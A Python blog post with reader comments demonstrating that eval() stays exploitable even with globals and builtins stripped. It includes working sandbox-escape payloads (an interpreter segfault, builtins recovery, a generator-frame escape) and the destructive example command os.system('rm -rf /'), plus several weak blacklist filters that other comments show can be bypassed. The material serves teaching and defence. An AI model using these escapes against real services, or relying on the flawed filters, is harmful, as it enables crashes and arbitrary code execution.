Eval really is dangerous

Wednesday 6 June 2012

Python has an eval() function which evaluates a string of Python code:

assert eval("2 + 3 * len('hello')") == 17

This is very powerful, but is also very dangerous if you accept strings to evaluate from untrusted input. Suppose the string being evaluated is “os.system('rm -rf /')”? It will really start deleting all the files on your computer. (In the examples that follow, I’ll use ‘clear’ instead of ‘rm -rf /’ to prevent accidental foot-shootings.)

Some have claimed that you can make eval safe by providing it with no globals. eval() takes a second argument, a dictionary of the global values to use during the evaluation. If you don’t provide a globals dictionary, then eval uses the current globals, which is why “os” might be available. If you provide an empty dictionary, then there are no globals. This now raises a NameError, “name ‘os’ is not defined”:

eval("os.system('clear')", {})

But we can still import modules and use them, with the builtin function __import__. This succeeds:

eval("__import__('os').system('clear')", {})
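Why does __import__ still work with an empty dictionary? According to the Python 3 eval() documentation, if the globals dictionary has no '__builtins__' key, a reference to the builtins is inserted under that key before evaluation. A minimal Python 3 sketch (the article's own examples are Python 2), with the harmless math module standing in for os:

```python
# An "empty" globals dict does not stay empty after eval().
g = {}
eval("1 + 1", g)
print("__builtins__" in g)  # True: eval() filled in the builtins

# That is why __import__ is still reachable with {} as globals.
print(eval("__import__('math').sqrt(16)", {}))  # 4.0
```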

The next attempt to make things safe is to refuse access to the builtins. Names like __import__ and open are available to you in Python 2 because they are in the __builtins__ global. We can explicitly specify that there are no builtins by defining that name as an empty dictionary in our globals. Now this raises a NameError:

eval("__import__('os').system('clear')", {'__builtins__':{}})
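The same thing happens in Python 3: mapping '__builtins__' to an empty dict makes builtin names fail to resolve. Literal syntax and attribute access still work, though, and that is the foothold the rest of this post uses. A small sketch:

```python
NO_BUILTINS = {"__builtins__": {}}

try:
    eval("__import__('math')", NO_BUILTINS)
except NameError as exc:
    print("blocked:", exc)

# No names are needed to build a tuple and ask for its class.
print(eval("().__class__", NO_BUILTINS))  # <class 'tuple'>
```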

Are we safe now? Some say yes, but they are wrong. As a demonstration, running this in CPython will segfault your interpreter:

s = """
(lambda fc=(
    lambda n: [
        c for c in
            ().__class__.__bases__[0].__subclasses__()
            if c.__name__ == n
        ][0]
    ):
    fc("function")(
        fc("code")(
            0,0,0,0,"KABOOM",(),(),(),"","",0,""
        ),{}
    )()
)()
"""
eval(s, {'__builtins__':{}})

Let’s unpack this beast and see what’s going on. At the center we find this:

().__class__.__bases__[0]

which is a fancy way of saying “object”. The first base class of a tuple is “object”. Remember, we can’t simply say “object”, since we have no builtins. But we can create objects with literal syntax, and then use attributes from there.
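A quick Python 3 check of that claim, again with no builtins available:

```python
NO_BUILTINS = {"__builtins__": {}}

print(tuple.__bases__)  # (<class 'object'>,)
# Only a tuple literal and attribute lookups: no names at all.
print(eval("().__class__.__bases__[0]", NO_BUILTINS) is object)  # True
```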

Once we have object, we can get the list of all the subclasses of object:

().__class__.__bases__[0].__subclasses__()

or in other words, a list of all the classes derived directly from object that have been created up to this point in the program. We’ll come back to this at the end. If we shorthand this as ALL_CLASSES, then this is a list comprehension that examines all the classes to find one named n:

[c for c in ALL_CLASSES if c.__name__ == n][0]

We’ll use this to find classes by name, and because we need to use it twice, we’ll create a function for it:

lambda n: [c for c in ALL_CLASSES if c.__name__ == n][0]

But we’re in an eval, so we can’t use the def statement, or the assignment statement to give this function a name. But default arguments to a function are also a form of assignment, and lambdas can have default arguments. So we put the rest of our code in a lambda function to get the use of the default arguments as an assignment:

(lambda fc=(
    lambda n: [
        c for c in ALL_CLASSES if c.__name__ == n
        ][0]
    ):
    # code goes here...
)()
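Here is the default-argument trick as a runnable Python 3 sketch. It binds fc inside a no-builtins eval and, instead of running a payload, just returns fc so we can inspect it. Keep in mind that __subclasses__() returns only the direct subclasses of object; the two classes this post needs, function and code, happen to be among them, as the checks against types.FunctionType and types.CodeType show.

```python
import types

NO_BUILTINS = {"__builtins__": {}}

# The default value of fc is evaluated once, naming the lambda without any "=" statement.
finder_src = (
    "(lambda fc=(lambda n: [c for c in ().__class__.__bases__[0].__subclasses__()"
    " if c.__name__ == n][0]): fc)()"
)
fc = eval(finder_src, NO_BUILTINS)

print(fc("function") is types.FunctionType)  # True
print(fc("code") is types.CodeType)          # True
```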

Now that we have our “find class” function fc, what will we do with it? We can make a code object! It isn’t easy: you need to provide 12 arguments to the constructor, but most can be given simple default values.

fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,"")

The string “KABOOM” holds the actual bytecodes to use in the code object, and as you can probably guess, “KABOOM” is not a valid sequence of bytecodes. Actually, any one of these bytecodes would be enough: they are all binary operators that will try to operate on an empty operand stack, which will segfault CPython. “KABOOM” is just more fun, thanks to lvh for it.

This gives us a code object: fc("code") finds the class “code” for us, and then we invoke it with the 12 arguments. You can’t invoke a code object directly, but you can create a function with one:

fc("function")(CODE_OBJECT, {})

And of course, once you have a function, you can call it, which will run the code in its code object. In this case, that will execute our bogus bytecodes, which will segfault the CPython interpreter. Here’s the dangerous string again, in more compact form:

(lambda fc=(lambda n: [c for c in ().__class__.__bases__[0].__subclasses__()
    if c.__name__ == n][0]): fc("function")(fc("code")(0,0,0,0,"KABOOM",(),
    (),(),"","",0,""),{})())()

So eval is not safe, even if you remove all the globals and the builtins!
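To watch the whole chain run without crashing anything, here is a harmless Python 3 variant. It is a sketch, not the original payload: instead of building a code object from bogus bytecodes with fc("code"), it borrows the valid code object of a tiny lambda, wraps it with fc("function"), and calls the result, all inside a no-builtins eval.

```python
NO_BUILTINS = {"__builtins__": {}}

harmless = (
    "(lambda fc=(lambda n: [c for c in ().__class__.__bases__[0].__subclasses__()"
    " if c.__name__ == n][0]):"
    " fc('function')((lambda: 6 * 7).__code__, {})())()"
)
print(eval(harmless, NO_BUILTINS))  # 42
```

Swap the borrowed code object for a hand-built one and the same construct runs whatever bytecode it is given. In Python 3 the code constructor takes a different, version-dependent argument list (see the Python 3 discussion in the comments).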

We used the list of all subclasses of object here to make a code object and a function. You can of course find other classes and use them. Which classes you can find depends on where the eval() call actually is. In a real program, there will be many classes already created by the time the eval() happens, and all of them will be in our list of ALL_CLASSES. As an example:

s = """
[
    c for c in
    ().__class__.__bases__[0].__subclasses__()
    if c.__name__ == "Quitter"
][0](0)()
"""

The standard site module defines a class called Quitter; an instance of it is what the name “quit” is bound to, so that you can type quit() at the interactive prompt to exit the interpreter. So in eval we simply find Quitter, instantiate it, and call it. This string cleanly exits the Python interpreter.

Of course, in a real system, there will be all sorts of powerful classes lying around that an eval’ed string could instantiate and invoke. There’s no end to the havoc that could be caused.

The problem with all of these attempts to protect eval() is that they are blacklists. They explicitly remove things that could be dangerous. That is a losing battle because if there’s just one item left off the list, you can attack the system.

While I was poking around on this topic, I stumbled on Python’s restricted evaluation mode, which seems to be an attempt to plug some of these holes. Here we try to access the code object for a lambda, and find we aren’t allowed to:

>>> eval("(lambda:0).func_code", {'__builtins__':{}})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 1, in <module>
RuntimeError: function attributes not accessible in restricted mode

Restricted mode is an explicit attempt to blacklist certain “dangerous” attribute access. It’s specifically triggered when executing code if your builtins are not the official builtins. There’s a much more detailed explanation and links to other discussion on this topic on Tav’s blog. As we’ve seen, the existing restricted mode isn’t enough to prevent mischief.

So, can eval be made safe? Hard to say. At this point, my best guess is that you can’t do any harm if you can’t use any double underscores, so maybe if you exclude any string with double underscores you are safe. Maybe...
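Part of the trouble with filtering on "__": the source never has to contain a double underscore to produce a dunder name at run time. The snippet below is harmless on its own, since it only builds a string, but paired with a lookup that accepts strings (one of the comments below does this through generator frames) it sidesteps the filter. A Python 3 sketch:

```python
NO_BUILTINS = {"__builtins__": {}}

src = "'_' + '_builtins_' + '_'"
print("__" in src)             # False: a substring filter sees nothing
print(eval(src, NO_BUILTINS))  # __builtins__
```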

Update: from a thread on Reddit about recovering cleared globals, a similar snippet that will get you the original builtins:

[
    c for c in ().__class__.__base__.__subclasses__()
    if c.__name__ == 'catch_warnings'
][0]()._module.__builtins__

Comments

[gravatar]
Great in-depth investigation. When I've talked about this in the past (and in 2 days at PyGotham) I've always kind of hand-waved about the risks of eval() and exec (which I believe has all of the same risks inherent?), but now I can just point people here. Thanks for saving me some work!
[gravatar]
There's an interesting attempt at a restricted python: https://github.com/haypo/pysandbox .

I used it in a chatbot once to allow people to eval simple python statements: https://github.com/llimllib/pyphage/blob/master/plugins/eval.py

While it was vulnerable to DOS (the timeout function did not work properly on memory intensive functions: https://github.com/haypo/pysandbox/issues/10 ), I let some pretty serious python hackers have a go at it and they weren't able to break it.

I wouldn't trust it on a for-real server, obviously, but it was good enough for the task I set out to accomplish in that scenario.
[gravatar]
Reading this, I was confused. Of course eval() (and exec()) are dangerous if you don't trust the strings to be evaluated.

The article seems to be missing a basic stipulation, perhaps "running untrusted code is dangerous". You seem to be trying to prove that no matter what you do, you can't fully isolate and sanitize untrusted code. OK, I buy that. But I think the article needs a liberal sprinkling of "... for untrusted code/input/source".

eval() and exec() are perfectly safe for trusted code, useful and even necessary on occasion (e.g. dynamic programming). Just never *ever* use them with untrusted input.
[gravatar]
Sadly, eval can also evaluate... eval. So the double-underscore trick doesn't work:
eval('eval("()._" + "_class_" + "_._" + "_bases_" + "_[0]")')
<type 'object'>
[gravatar]
The solution I'd use if you need this is to use the PyPy sandbox. It isn't quite ready for use, but it's pretty close, and it's fully software virtualized so much safer than eval.

Incidentally, Ned himself did some work on it to speed up the startup a few months ago. That's still the main area that needs work, too.

Also, using eval to be "dynamic" is icky.
[gravatar]
> At this point, my best guess is that you can't do any harm if you can't use any double underscores, so maybe if you exclude any string with double underscores you are safe.

You could always concatenate single underscores. But if you prevent all direct accesses to dunder-methods and dunder-attributes (__subclasses__ in this case, and the indirect access via __getattribute__) this threat should be mostly mitigated. Far's I can tell, this means walking the bytecode and forbidding all LOAD_ATTR to a dunder method or attribute.

> Sadly, eval can also evaluate... eval.

Eval's a builtin, if you remove all builtins you can't eval eval:
>>> eval('eval("()._" + "_class_" + "_._" + "_bases_" + "_[0]")', {'__builtins__': {}})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 1, in <module>
NameError: name 'eval' is not defined
[gravatar]
The easy (to type) related answer is "Use an OS with RBAC and configure it properly."
[gravatar]
Masklinn: aha, of course! My mistake. Thanks :)
[gravatar]
> walking the bytecode and forbidding all LOAD_ATTR to a dunder method or attribute.

Thought about it for a bit longer this time: you don't actually need to walk the bytecode, just look in co_names and forbid any dunder name in it (this will catch access to user-created ones as well, but I'm not sure there's any reason to care).
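A rough Python 3 sketch of the co_names idea. One detail matters: code inside a lambda or comprehension is compiled into a nested code object stored in co_consts, so checking only the top-level co_names misses it. dunder_names is a made-up helper name. Note also that a payload that never names a dunder attribute (like the generator-frame one further down the thread) passes this check.

```python
import types

def dunder_names(code):
    """Collect dunder names from code.co_names, recursing into nested code objects."""
    found = {n for n in code.co_names if n.startswith("__") and n.endswith("__")}
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            found |= dunder_names(const)
    return found

top = compile("(lambda: ().__class__.__bases__[0])()", "<untrusted>", "eval")
print(top.co_names)       # the dunders are not at the top level...
print(dunder_names(top))  # ...but the recursive walk finds them in the lambda
```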
[gravatar]
ast.literal_eval() is a useful alternative for one common use of eval() - to evaluate literal expressions. For example you can convert the string representation of a list into a real list:
>>> ast.literal_eval('[2, 3, "some list"]')
[2, 3, 'some list']
http://docs.python.org/library/ast.html#ast.literal_eval
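Because literal_eval only accepts literal structures (strings, numbers, tuples, lists, dicts, sets, booleans, None and the like), anything involving a call or an attribute lookup is rejected with a ValueError instead of being run. A quick Python 3 check:

```python
import ast

print(ast.literal_eval('[2, 3, "some list"]'))  # [2, 3, 'some list']

rejected = []
for src in ["__import__('os')", "().__class__"]:
    try:
        ast.literal_eval(src)
    except ValueError:
        rejected.append(src)
print(rejected)  # both strings are refused
```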
[gravatar]
eval() is not evil, the os module is not evil, only some functions of the os module are dangerous. I wrote the pysandbox project which installs a lot of protections in the CPython interpreter to hide dangerous function but also any way to get access to these functions. For example, you can give access to the os.urandom() function if you enable the "random" feature of pysandbox. You get an os module with only one function: urandom().

https://github.com/haypo/pysandbox

Bill Mill already mentioned pysandbox.

"While it was vulnerable to DOS (the timeout function did not work properly on memory intensive functions: https://github.com/haypo/pysandbox/issues/10 ),"

I'm working on a new version (1.6) which runs untrusted code in a subprocess. I reintroduced the timeout option; it is now safe (and implemented completely differently).
[gravatar]
Christian Heimes 3:55 PM on 6 Jun 2012
I'm using a modified version of seval from an example at activestate for simplistic restricted Python. The code uses the compiler package and a custom AST walker to verify the code. You can disable certain keywords like raise or forbid access to attributes and objects.

Here is my modified version: http://pastebin.mozilla.org/1657291
[gravatar]
Hey thanks. http://lucumr.pocoo.org/2011/2/1/exec-in-python/ was also a good read. I've heard about some pretty cool things done with AST test case function invocation introspection. I believe Sage has a few examples of walking the AST.
[gravatar]
@David Goodger: Yes, you are right, I meant, "safe for untrusted input." I've added that clause to the opening paragraph to make it clearer.

About sandboxes, @lahwran is right, we've worked on the PyPy sandbox, though this investigation was not to try to fix eval, but instead to find a convincing example for people who think eval can be fixed for untrusted input.

Everyone else, thanks for the interesting pointers and suggestions.
[gravatar]
Eval'ing an arbitrary string is like sql.exec'ing an arbitrary string: an obvious security hole, since judging its safety means parsing and understanding the string to look for malicious code.

The philosophy for safe eval'ing should be like SQL prepare: using placeholders with validations, or ... being imaginative:
eval("dispatch_table[%r](*%s, **%s)" % (func, loads(table_as_json), loads(dict_as_json)))

If we do so, the advantage are :
- with a dispatch table we can limit the safe available functions, and if dispatch keys are easy ([a-zA-Z]{8,12}), then, escaping seems very hard ;
- if we use named argument serialized in json it would be easier to avoid active charge in the arguments (only «passive data» are json'able).


ofc it seems very reductive (it looks like we cannot build complex functions trees), unless you notice that if the dispatch table is global, then, dispatch table keys can also be passed as arguments, with arguments.

Okay, it looks like LISP. But all safe parsing problems seem to point to a LISP-like solution.
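For what it's worth, the dispatch-table part of this idea doesn't need eval at all: once the function is chosen by key and the arguments arrive as JSON, you can look the function up and call it directly, so no string is ever compiled. A Python 3 sketch; dispatch_table, join_words and call_from_json are hypothetical names:

```python
import json
import math

# Hypothetical whitelist: the only callables the untrusted side can reach.
dispatch_table = {
    "hypot": math.hypot,
    "join_words": lambda *words, sep=" ": sep.join(words),
}

def call_from_json(func_name, args_json, kwargs_json):
    func = dispatch_table[func_name]  # KeyError for anything not whitelisted
    args = json.loads(args_json)      # JSON can only carry passive data
    kwargs = json.loads(kwargs_json)
    if not isinstance(args, list) or not isinstance(kwargs, dict):
        raise ValueError("args must be a JSON array and kwargs a JSON object")
    return func(*args, **kwargs)

print(call_from_json("hypot", "[3, 4]", "{}"))                        # 5.0
print(call_from_json("join_words", '["a", "b"]', '{"sep": "-"}'))     # a-b
```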
[gravatar]
Slightly off-topic, but just to confirm I understand: It's for these kinds of reasons that I shouldn't be importing a Python source file as my application's config file (because if a user lets malicious input into the config file, then my application will execute it.) So I should be using ConfigObj instead, is that still a recommended route these days?
[gravatar]
@Jonathan: an important point about "untrusted input" is, who is your user, where are they, and what damage could they do if you ran code from them? For example, on a desktop application, the program is running on the user's own machine. If they try to "rm -rf /", they will be deleting their own files. Perhaps not something you need to be concerned with. If you're building a web service, then the user is anyone on the internet, and they could destroy your server, a much more dangerous proposition.
[gravatar]
@Ned, thanks for that clarification, which makes sense on one level, but on the other hand: If my application was responsible for deleting all of a user's Desktop files (or many users), then while that is less serious to me and my business, it's obviously more serious to the affected users. I'm not yet convinced that it's something I don't need to worry about. I guess it boils down to: is there ever a time when an attacker is not able to execute arbitrary (Python) code, but is able to insert arbitrary Python code into my application's appropriately-permissioned config file? My application would then execute this code, and be blamed as one link in the chain which created the exploited security hole. But if this scenario isn't actually a threat, then I'll continue to store my application config in Python source and effectively 'eval' it when my application runs.
[gravatar]
Is eval without _ (underscore), . (dot), [ and ] (square brackets), " and ' (double-quote and single-quote) dangerous too?
[gravatar]
Almost certainly. There are usually ways to get other values without entering, say, " - but even short of that, there's _always_ the risk of bugs in the interpreter. There are all sorts of things that aren't tested because people don't use the interpreter that way.

If you want serious, hardcore foreign-code safety, you'll need something like the pypy sandbox or an OS-level thing like virtualization. and even that is vulnerable to some things, apparently people are stealing encryption keys from neighboring VMs now.
[gravatar]
@Janus: it depends what kind of risk you're talking about. For example, "9**9**9**9**9" will consume all your memory, and bugs like http://bugs.python.org/issue14010 exist and can be exploited.
[gravatar]
Let's consider DoS a non-issue. But I don't need * so I'll disallow it anyway.

I currently use the following cleaner (don't worry, it's not a serious project):
cleancode = lambda x: re.sub("[^0-9A-z _\^|&()]","",x)
Every single exploit I have seen has used [ or . or *. I just want to evaluate boolean literals in a simple way. ast.literal_eval is not really evaluating, just parsing. I have yet to see a non-DoS exploit using the character set above...

I'll PayPal € 5 to the first person that shows me a non-DoS exploit in under 100 characters that survives the filter above.
[gravatar]
(no builtins of course, only Python 3.2+)
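A detail worth checking in that filter: inside a regex character class, A-z is the ASCII range 65 to 122, which also covers [ \ ] ^ _ and the backtick. So [ survives the filter even though the comment aims to exclude it; A-Za-z was presumably intended. A quick Python 3 check (fixed_clean is a hypothetical corrected version):

```python
import re

# The filter from the comment, written as a raw string to avoid an escape warning.
cleancode = lambda x: re.sub(r"[^0-9A-z _\^|&()]", "", x)
# Hypothetical corrected version with separate upper- and lower-case ranges.
fixed_clean = lambda x: re.sub(r"[^0-9A-Za-z _^|&()]", "", x)

between = "".join(chr(i) for i in range(ord("Z") + 1, ord("a")))
print(repr(between))        # '[\\]^_`'
print(cleancode("x[0]"))    # x[0]  (brackets pass through)
print(fixed_clean("x[0]"))  # x0
```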
[gravatar]
Try

((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((1))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

s_push: parser stack overflow
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
MemoryError

It's not a crash, but a funny error, and the code matches your regex ;)
[gravatar]
What would be a Python 3 version? It seems that code takes 13 arguments instead of 12. I'm curious if it still segfaults.
[gravatar]
@Aaron: it does still segfault, you just have to provide one more argument, and make some of them byte strings:
(0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"")
[gravatar]
Vladislav Stepanov 2:14 PM on 8 May 2014
Hi, Ned!
I've translated your post into Russian; you can find it here: http://habrahabr.ru/post/221937/
Is it ok for you? Sorry for not asking in advance:(
[gravatar]
Actually there is a way to protect yourself against that issue, and please correct me if I am wrong:

Using ast.parse and then searching for any system attribute invocation, you can detect problematic code and block it from being executed. One also has to block the exec statement, though. Here is an example:
def check_ast_node_is_safe(node):
    '''
    Check that the ast node does not contain any system attribute calls
    as well as exec call (not to construct the system attribute names with strings).

    eval() and exec() function calls should not be a problem, as they are not exposed
    in the globals and __builtins__

    >>> node = ast.parse('def __call__(): return 1')
    >>> node == check_ast_node_is_safe(node)
    True

    >>> check_ast_node_is_safe(ast.parse('def m(): return ().__class__'))
    Traceback (most recent call last):
        ...
    InvalidEvalExpression


    >>> check_ast_node_is_safe(ast.parse('def horror(g): exec "exploit = ().__" + "class" + "__" in g'))
    Traceback (most recent call last):
        ...
    InvalidEvalExpression

    '''

    for n in ast.walk(node):
        if isinstance(n, ast.Attribute):
            if n.attr.startswith('__'):
                raise InvalidEvalExpression()
        elif isinstance(n, ast.Exec):
            raise InvalidEvalExpression()
    return node

def safe_eval(expr, **kwargs):
    '''
    Safely execute expr (...an excerpt...)
    '''
    ...
    g = {'__builtins__': {}, 'object': object, '__name__': __name__}
    # __builtins__ should be masked away to disable builtin functions
    # object is needed if the NewStyle class is being created
    # __name__ is needed to be able to compile a class
    g.update(kwargs)

    node = compile(expr, '', 'exec', ast.PyCF_ONLY_AST | compiler.consts.CO_FUTURE_PRINT_FUNCTION)
    node = check_ast_node_is_safe(node)
    
    cc = compile(node, '', 'exec')  # can be nicely cached
    l = {}
    exec (cc, g, l)
    ...

[gravatar]
Hi,

I wanted to use eval in my code, but I found the drawbacks of eval, so I found my own way, but I wanted to check whether we can break this code. Here I don't want arithmetic operations.

def hack():
    print("You can't hack my code.")
    return "break";

str1 = "lambda open read + - * / % ** // "
str2 = "().__class__.__bases__[0].__subclasses__()"
try:
    print(eval(str1.replace('()', 'hacker').replace('lambda', 'hacker').replace('open', 'hacker').replace('**', 'hacker').replace('/', 'hacker').replace('%', 'hacker').replace('*', 'hacker').replace('+', 'hacker').replace('-', 'hacker'), {'__builtins__': {}}, {'hacker': hack()}))
except (IOError, AttributeError, SyntaxError, RuntimeError):
    print("Invalid string found")
except:
    raise
[gravatar]
Small change:
print(eval(
jsn['logic18'].replace('().', 'hacker()').replace('__class__', 'hacker() ').replace('lambda', 'hacker()').replace('open', 'hacker()').replace(
'**', 'hacker()').replace('/', 'hacker()').replace('%', 'hacker()').replace('*', 'hacker()').replace(
'+','hacker()').replace('-', 'hacker()'), {'__builtins__': {}},
{'hacker': hack}))
[gravatar]
@Kiran: I don't think a blacklist approach is going to work, unless you are willing to leave very little that is possible, that is, unless you make it something so weak that it is uninteresting. Also, your examples here don't make much sense. Where is the user's untrusted input?
[gravatar]
@Ned: Here, if I replace "jsn['logic18']" with anything, my program must not break. In the above operation I am not allowing anyone to import or instantiate any object except the given local objects, and if someone wants to break it using arithmetic operations like "9**9**9**9**9", "1/0", 1/(10 *0), etc., my code still must not break. I restricted access and arithmetic failures, so now I can call any local functions using my input string.
[gravatar]
@Kiran: this technique isn't giving you any safety. You replace "().", but what about "( )."? or "( ) . "? I'm not sure you've read this blog post carefully: there are many ways to cause mischief, you can't prevent them all with a blacklist.
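The point about "( )." is easy to confirm: spaces between these tokens are insignificant, so spaced-out spellings reach the same attribute without ever containing the exact substring "()." that the replace() calls look for. A small Python 3 sketch:

```python
NO_BUILTINS = {"__builtins__": {}}

variants = ["().__class__", "( ).__class__", "() . __class__"]
for src in variants:
    # Only the first contains "()." yet all three evaluate to the tuple class.
    print(repr(src), "()." in src, eval(src, NO_BUILTINS))
```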
[gravatar]
@Ned: I have added '__class__' to the blacklist. Do you have any other ways to make mischief with eval?
[gravatar]
You are thinking about this wrong. This is not simply hard, it effectively cannot be done. do not use eval. if you want to run math, then make your own language, with your own parser, and your own runner - it isn't actually very hard with the help of something like parsley. if you eval foreign code, then you *will* lose. as long as you are using eval, I will be able to find a way through it. I ran through your code and tested attacks until I found one that worked, with all the restrictions; at least one exists, and I will not tell you what it is. This approach is broken. Do not use it. If you want to be able to run python code remotely, check out the pypy sandbox, or use one of the os-level sandboxes. Do not use eval. Presumably someone linked you to this page; they did so for a reason. Do not use eval. Do not use exec. Do not run foreign python code without manually checking it.

Abandon hope, all ye who eval foreign code.
[gravatar]
despite that you claim to have disallowed these, and despite running in restricted mode, your example has ways for me to:
- make arbitrary functions
- import any module I like
- call any function that is available outside the sandbox - any function, not just built in ones
- replace any code outside the sandbox
- crash cpython in one of a variety of ways

you can't do it. if you deploy this, someone will break into it.

Here's some code you can use that actually-safely does an eval with foreign code:

def hack():
    print("You can't hack my code.")
    return "break";

str1 = jsn["logic18"]
try:
    str1 = "" # to make sure it's safe to eval
    print(eval(str1))
except (IOError, AttributeError, SyntaxError, RuntimeError):
    print("Invalid string found")
except:
    raise
[gravatar]
Extremely interesting article. But it begs the question:
Has this been tested on a machine?
Or is this from a purely 'mathematical'(?) standpoint?
Did you arrive at this based on your knowledge of the behaviour of python functions?
[gravatar]
@Nag: of course it's been tested on machine. You can test it yourself. There was plenty of experimentation to arrive at the final construction.
[gravatar]
I simply (naive) redefined eval(). Works for what I am up to -- there is no longer a there, there.
[gravatar]
Possible solution when:
- You have a small subset of the language, such as a calculator, maybe some numpy stuff, etc...
- You don't want to spend time implementing the language (because you are lazy and want it all in under 15 lines of code)

Use ast to validate, and if it passes, eval it.

Whitelist instead of blacklist (because blacklisting only works if you are comprehensive, and I don't trust myself to be comprehensive). If you accidentally omit something in a whitelist you lose functionality. If you accidentally omit something in a blacklist, you have a bigger problem. It's like trying to make a lock that specifically resists each skeleton key you know about.

You need two whitelists: an ast node whitelist and a name whitelist.

To save yourself a headache, generate your node whitelist like this:
  sample = 'Foo(a[b] + a * a / a // a ** a % a ^ a & a | a and (a != b or c == d))'
  node_whitelist = set([x.__class__.__name__ for x in ast.walk(ast.parse(sample))])
... that way if you forgot something, you just add it to your sample. Just add syntax that you actually need, and be mindful how that syntax could be used (in this example attribute access is not included, as that involves additional care).

Your symbol whitelist might come from a module or whatever. Probably best to do it by hand. Just make sure you are aware of the contents and that it doesn't have stuff like '__dict__' in there, and think whitelist, not blacklist.
  name_whitelist = ['sin', 'cos', 'pi', ...]
The validation test looks something like:
def safe_eval(s, context):
  tree = ast.parse(s)  # parse once and reuse the tree for both checks
  nodes = set([x.__class__.__name__ for x in ast.walk(tree)])
  names = set([x.id for x in ast.walk(tree) if x.__class__.__name__ == 'Name'])
  bad = (nodes - node_whitelist) | (names - set(name_whitelist))

  if bad:
    raise ValueError('Illegal use of {} in expression'.format(list(bad)[0]))

  return eval(s, context)
Note that if I had whitelisted attribute access (explicitly, by including "a.b" in the sample expression), I'd need to implement an attribute whitelist to check against set([x.attr for x in ast.walk(ast.parse(s)) if x.__class__.__name__ == 'Attribute']). But for this use case, attributes are not necessary, and security seems a little simpler without them.

This won't prevent DOS attacks with various kinds of extreme math. AFAIK, that can only effectively be dealt with at the process level. I'm pretty sure there is no lexical approach to preventing extreme math in a sufficiently useful tool. And I acknowledge that this post is incomplete without a discussion of Gödel's theorem. Too bad.

So, other than DOS, is this solid? Please let me know of any inevitable hacks!
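A self-contained run of the same whitelist idea, as a sketch assuming Python 3.8+ and a math-only context. One thing to watch: on 3.8+ numeric literals parse as ast.Constant nodes, which the sample above doesn't contain, so this version adds a literal to the sample (otherwise even "cos(0) + 1" would be rejected).

```python
import ast
import math

# Sample listing the allowed syntax; "+ 1.5" contributes the Constant node type.
sample = "Foo(a[b] + a * a / a // a ** a % a ^ a & a | a and (a != b or c == d)) + 1.5"
node_whitelist = {type(x).__name__ for x in ast.walk(ast.parse(sample))}
name_whitelist = {"sin", "cos", "pi"}

def safe_eval(s, context):
    tree = ast.parse(s)
    nodes = {type(x).__name__ for x in ast.walk(tree)}
    names = {x.id for x in ast.walk(tree) if isinstance(x, ast.Name)}
    bad = (nodes - node_whitelist) | (names - name_whitelist)
    if bad:
        raise ValueError("Illegal use of {} in expression".format(sorted(bad)[0]))
    return eval(s, context)

context = {"__builtins__": {}, "sin": math.sin, "cos": math.cos, "pi": math.pi}
print(safe_eval("cos(0) + 1", context))  # 2.0
```

Attribute access such as "().__class__" is refused because neither Attribute nor Tuple appears in the sample.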
[gravatar]
Stefan Pochmann 8:01 PM on 22 Dec 2017
As a corollary, `input()` in Python 2 is also dangerous, probably even *more* dangerous (because it's probably much more widely used, especially by beginners, *and* because the eval-aspect isn't as obvious as it is when explicitly calling eval). But nobody seems to be talking about that. Odd.
[gravatar]
Stefan Pochmann 8:11 PM on 22 Dec 2017
Hmm, on the other hand, I guess `input()` is typically only used where the user is the owner of the machine, not an adversary. While `eval()` might be more likely to get used on strings coming from other people.
[gravatar]
lahwran or any other skeptics, if you are following, I'm curious to see your rebuttal to my previous post.

Not impossible at all. Easy to implement safe-eval with correct thinking.

It only appears to be impossible because there are so many examples of failed attempts based on a flawed approach, which is to disallow (blacklist) dangerous strings. That approach can't work because the set of hacking strategies is impossible to enumerate.
[gravatar]
"my best guess is that you can’t do any harm if you can’t use any double underscores, so maybe if you exclude any string with double underscores you are safe."

Simply checking for "__" in the string doesn't seem to be sufficient. You can access the frame object of a generator expression without any double-underscores, and from there, access the globals of any frame higher up in the program. The only tricky part is that the complete frame object hierarchy is only accessible when the generator is executing, so you need a little self-referential trickery if you're in an `eval` and have no access to assignment. Proof of concept:
s = "q = (q.gi_frame.f_back.f_back.f_globals for _ in (1,)); builtins = [*q][0]['_' + '_builtins_' + '_']; builtins.print('Gotcha:', builtins.dir(builtins))"
exec(s, {'__builtins__': {}})
On my machine, this prints all the builtins that the attacker can now access, from `ArithmeticError` to `zip`.

Here's the same approach using `exec`, which is a little more readable since a self-referential generator expression is trivial if you can use an assignment statement:
s = "q = (q.gi_frame.f_back.f_back.f_globals for _ in (1,)); builtins = [*q][0]['_' + '_builtins_' + '_']; builtins.print('Gotcha:', builtins.dir(builtins))"
exec(s, {'__builtins__': {}})
[gravatar]
Oops, typo in my previous message. The first code block was supposed to be:
s = "(lambda b: b.print('gotcha:', b.dir(b)))([*([x.append((x[0].gi_frame.f_back.f_back.f_globals for _ in (1,))) or x[0] for x in [[]]][0])][0]['_' + '_builtins_' + '_'])"
eval(s, {'__builtins__': {}})
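To see why the earlier AST-based check (and a plain "__" substring test) wouldn't stop this payload, here is a Python 3 port of that check's core idea: flag any ast.Attribute whose name starts with "__" (ast.Exec no longer exists in Python 3). has_dunder_attribute is a made-up name, and the payload is only parsed, never executed:

```python
import ast

def has_dunder_attribute(src):
    """True if any attribute access in src uses a name starting with '__'."""
    return any(
        isinstance(node, ast.Attribute) and node.attr.startswith("__")
        for node in ast.walk(ast.parse(src))
    )

payload = (
    "(lambda b: b.print('gotcha:', b.dir(b)))([*([x.append((x[0].gi_frame.f_back"
    ".f_back.f_globals for _ in (1,))) or x[0] for x in [[]]][0])][0]"
    "['_' + '_builtins_' + '_'])"
)
print("__" in payload)                       # False
print(has_dunder_attribute(payload))         # False: gi_frame, f_back, f_globals are plain names
print(has_dunder_attribute("().__class__"))  # True
```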
[gravatar]
As I mentioned in my previous post, blacklisting (e.g. attempting to disallow double underscore) is futile. You have to whitelist instead (i.e. describe what is allowed, and keep that limited).
[gravatar]
This article (and comments) is very informative! Thank you for sharing!


I have an idea of making safe_eval. Simply disallow the usage of dot "." and f-strings


I am thinking of using something like

def safe_exec(st): #oversimplified
